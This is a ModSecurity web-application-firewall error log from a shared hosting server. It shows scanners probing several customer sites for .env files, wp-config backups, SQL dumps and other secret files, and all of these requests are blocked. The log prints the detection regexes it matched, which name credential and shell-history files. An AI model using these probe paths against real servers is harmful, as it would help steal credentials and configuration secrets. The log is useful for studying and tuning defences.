[Tue May 26 19:57:22.160226 2026] [security2:error] [pid 93868:tid 94357] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/express/.env"] [unique_id "ahWtykqK9k_ZUB2Vp25kfwAAAfI"]
[Tue May 26 19:57:22.291181 2026] [security2:error] [pid 93576:tid 93611] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahWtymDRMqfxdEDkoszh7AAAJSA"]
[Tue May 26 19:57:22.558472 2026] [security2:error] [pid 93576:tid 93613] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/api/.env"] [unique_id "ahWtymDRMqfxdEDkoszh8QAASyI"]
[Tue May 26 19:57:22.798868 2026] [security2:error] [pid 93868:tid 94285] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/discord.php.bak"] [unique_id "ahWtykqK9k_ZUB2Vp25klQAAAao"]
[Tue May 26 19:57:22.812833 2026] [security2:error] [pid 93576:tid 93612] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/config.php"] [unique_id "ahWtymDRMqfxdEDkoszh8gAASiE"]
[Tue May 26 19:57:22.837231 2026] [security2:error] [pid 93868:tid 94271] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtykqK9k_ZUB2Vp25kiwAAAZw"]
[Tue May 26 19:57:22.845351 2026] [security2:error] [pid 93868:tid 94071] [remote 217.174.148.171:58928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWtykqK9k_ZUB2Vp25kkQAB2Rk"]
[Tue May 26 19:57:23.048710 2026] [security2:error] [pid 93576:tid 93614] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/settings.php"] [unique_id "ahWty2DRMqfxdEDkoszh9QAAHSM"]
[Tue May 26 19:57:23.409284 2026] [security2:error] [pid 93576:tid 93598] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-config.php"] [unique_id "ahWty2DRMqfxdEDkoszh_QAAWhM"]
[Tue May 26 19:57:23.683181 2026] [security2:error] [pid 93576:tid 93615] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/config.php.bak"] [unique_id "ahWty2DRMqfxdEDkosziAwAAJCQ"]
[Tue May 26 19:57:23.945902 2026] [security2:error] [pid 93576:tid 93617] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "landsonlogistics.com"] [uri "/wp-config.php.backup"] [unique_id "ahWty2DRMqfxdEDkosziBQAAQCY"]
[Tue May 26 19:57:24.238761 2026] [security2:error] [pid 93868:tid 94368] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/laravel/core/.env"] [unique_id "ahWtzEqK9k_ZUB2Vp25kzwAAAf0"]
[Tue May 26 19:57:24.397370 2026] [security2:error] [pid 93868:tid 94297] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/encrypt.php.old"] [unique_id "ahWtzEqK9k_ZUB2Vp25k1gAAAbY"]
[Tue May 26 19:57:24.592125 2026] [security2:error] [pid 93576:tid 93628] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "landsonlogistics.com"] [uri "/wp-config.php.bak"] [unique_id "ahWtzGDRMqfxdEDkosziCwAAETE"]
[Tue May 26 19:57:24.876933 2026] [security2:error] [pid 93868:tid 94350] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/organization/.env"] [unique_id "ahWtzEqK9k_ZUB2Vp25k7QAAAes"]
[Tue May 26 19:57:24.884550 2026] [security2:error] [pid 93576:tid 93629] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "landsonlogistics.com"] [uri "/wp-config.php.old"] [unique_id "ahWtzGDRMqfxdEDkosziEAAAbjI"]
[Tue May 26 19:57:25.134338 2026] [security2:error] [pid 93868:tid 94134] [remote 217.174.148.171:58928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWtzUqK9k_ZUB2Vp25k-AABszo"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:57:25.159193 2026] [security2:error] [pid 93868:tid 94328] [client 172.225.181.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWtzEqK9k_ZUB2Vp25k8QAAAdU"]
[Tue May 26 19:57:25.239776 2026] [security2:error] [pid 93576:tid 93632] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "landsonlogistics.com"] [uri "/wp-config.php.save"] [unique_id "ahWtzWDRMqfxdEDkosziFAAAZjQ"]
[Tue May 26 19:57:25.357760 2026] [security2:error] [pid 93868:tid 94373] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/dump.sql"] [unique_id "ahWtzUqK9k_ZUB2Vp25k_wAAAgI"]
[Tue May 26 19:57:25.651152 2026] [security2:error] [pid 93576:tid 93659] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "landsonlogistics.com"] [uri "/wp-config.php.swp"] [unique_id "ahWtzWDRMqfxdEDkosziGQAATk4"]
[Tue May 26 19:57:25.677136 2026] [security2:error] [pid 93868:tid 94286] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/http/.env"] [unique_id "ahWtzUqK9k_ZUB2Vp25lBwAAAas"]
[Tue May 26 19:57:25.835000 2026] [security2:error] [pid 93868:tid 94275] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.github/.env"] [unique_id "ahWtzUqK9k_ZUB2Vp25lEQAAAaA"]
[Tue May 26 19:57:25.886672 2026] [security2:error] [pid 93868:tid 94334] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtzUqK9k_ZUB2Vp25lAAAAAds"]
[Tue May 26 19:57:25.994142 2026] [security2:error] [pid 93868:tid 94279] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test.php.copy"] [unique_id "ahWtzUqK9k_ZUB2Vp25lFQAAAaQ"]
[Tue May 26 19:57:26.114846 2026] [security2:error] [pid 93576:tid 93661] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "landsonlogistics.com"] [uri "/wp-config.php.txt"] [unique_id "ahWtzmDRMqfxdEDkosziHgAAdFA"]
[Tue May 26 19:57:26.636533 2026] [security2:error] [pid 93868:tid 94314] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.mailjet.backup"] [unique_id "ahWtzkqK9k_ZUB2Vp25lIAAAAcc"]
[Tue May 26 19:57:26.794133 2026] [security2:error] [pid 93868:tid 94283] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shibboleth/.env"] [unique_id "ahWtzkqK9k_ZUB2Vp25lJQAAAag"]
[Tue May 26 19:57:26.953445 2026] [security2:error] [pid 93868:tid 94264] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/parcel.config.ts.bak"] [unique_id "ahWtzkqK9k_ZUB2Vp25lLgAAAZU"]
[Tue May 26 19:57:27.752180 2026] [security2:error] [pid 93868:tid 94377] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/index.sql"] [unique_id "ahWtz0qK9k_ZUB2Vp25lQgAAAgY"]
[Tue May 26 19:57:27.911587 2026] [security2:error] [pid 93868:tid 94351] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cms/.env.bak"] [unique_id "ahWtz0qK9k_ZUB2Vp25lTAAAAew"]
[Tue May 26 19:57:28.229700 2026] [security2:error] [pid 93868:tid 94381] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/helper/.env"] [unique_id "ahWt0EqK9k_ZUB2Vp25lVAAAAgo"]
[Tue May 26 19:57:28.281521 2026] [core:crit] [pid 93576:tid 93815] (13)Permission denied: [client 52.167.144.215:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:57:28.564878 2026] [security2:error] [pid 93868:tid 94378] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt0EqK9k_ZUB2Vp25lUwAAAgc"]
[Tue May 26 19:57:28.869122 2026] [security2:error] [pid 93868:tid 94293] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/proc/.env"] [unique_id "ahWt0EqK9k_ZUB2Vp25lagAAAbI"]
[Tue May 26 19:57:29.206590 2026] [security2:error] [pid 93868:tid 94199] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/web.config"] [unique_id "ahWt0UqK9k_ZUB2Vp25lcwABzV4"]
[Tue May 26 19:57:29.348993 2026] [security2:error] [pid 93868:tid 94347] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/module/info/include/mysql/phpcms_info.sql"] [unique_id "ahWt0UqK9k_ZUB2Vp25ldAAAAeg"]
[Tue May 26 19:57:29.989604 2026] [security2:error] [pid 93868:tid 94309] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/:80/.env"] [unique_id "ahWt0UqK9k_ZUB2Vp25lggAAAcI"]
[Tue May 26 19:57:30.080846 2026] [security2:error] [pid 93868:tid 94191] [remote 47.128.47.126:39590] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/medias/665-senegal-le-fdsut-connecte-trois-ecoles-de-la-banlieue-dakaroise"] [unique_id "ahWt0kqK9k_ZUB2Vp25ljQABw1o"]
[Tue May 26 19:57:31.186497 2026] [security2:error] [pid 93576:tid 93821] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt0mDRMqfxdEDkosziRQAAAG0"]
[Tue May 26 19:57:31.270779 2026] [security2:error] [pid 93868:tid 94341] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/profile/web.config"] [unique_id "ahWt00qK9k_ZUB2Vp25lqQAAAeI"]
[Tue May 26 19:57:32.267062 2026] [security2:error] [pid 93868:tid 94356] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/whm/.env"] [unique_id "ahWt1EqK9k_ZUB2Vp25lugAAAfE"]
[Tue May 26 19:57:33.222455 2026] [security2:error] [pid 93576:tid 93696] [remote 14.161.17.36:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWt1WDRMqfxdEDkosziWwAAQ3I"]
[Tue May 26 19:57:33.282759 2026] [security2:error] [pid 93868:tid 94365] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/verify/.env"] [unique_id "ahWt1UqK9k_ZUB2Vp25lygAAAfo"]
[Tue May 26 19:57:33.451430 2026] [security2:error] [pid 93868:tid 94262] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shopware/.env"] [unique_id "ahWt1UqK9k_ZUB2Vp25lywAAAZM"]
[Tue May 26 19:57:33.776733 2026] [security2:error] [pid 93576:tid 93724] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt1WDRMqfxdEDkosziZgAAAAw"]
[Tue May 26 19:57:33.790216 2026] [security2:error] [pid 93868:tid 94315] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailer.xml.bak"] [unique_id "ahWt1UqK9k_ZUB2Vp25l0gAAAcg"]
[Tue May 26 19:57:33.885933 2026] [security2:error] [pid 93576:tid 93581] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/web.config"] [unique_id "ahWt1WDRMqfxdEDkoszicgAAfwI"]
